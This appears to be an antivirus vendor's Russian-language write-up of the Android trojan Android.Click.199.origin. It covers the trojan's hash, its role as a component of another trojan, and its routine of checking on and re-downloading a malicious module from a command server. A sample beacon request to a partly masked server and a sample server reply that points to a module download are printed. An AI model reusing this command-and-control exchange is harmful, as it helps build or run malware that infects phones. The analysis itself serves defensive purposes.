Android.Click.199.origin

SHA1:

e730007d2f7a6c4988d0486a7f723ba3d5d47629

Android-троянец, представляющий собой jar-файл. Является компонентом вредоносной программы Android.RemoteCode.106.origin, которая запускает троянца автоматически после скачивания.

После старта Android.Click.199.origin действует до тех пор, пока не получит команду на завершение работы. Троянец скачивает и запускает вредоносный компонент x.awv.Awv (Android.Click.201.origin). Каждую минуту Android.Click.199.origin проверяет время последнего обновления этого модуля. Если компонент x.awv.Awv не обновлялся более 10 минут, троянец запрашивает его новую версию с управляющего сервера. Временные интервалы обновления и проверки модуля заданы в полученном с сервера конфигурационном файле вредоносного приложения.

Пример запроса:

GET http://*.*.65.235:18011/sys/action/?t=0&pn=com.antee.biblicalquiz&aid=99d078094e1be3b9&av=16&brand=unknown&model=sd
 HTTP/1.1 k&msg=eyJmIjp0cnVlfQ==&tid=&sv=10
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: *.*.65.235:18011
Connection: Keep-Alive
Accept-Encoding: gzip

Пример ответа сервера:

{
   "result":true,
   "data":[
      {
         "l":"/sys/module/load/3798b9d0-e307-4d31-b8a3-b0548010580f/",
         "h":"bb847f3156916617bea51f0af377d0a1"
      }
   ],
   "sessionId":"97503090-c52b-11e7-92f9-eb0023df245c"
}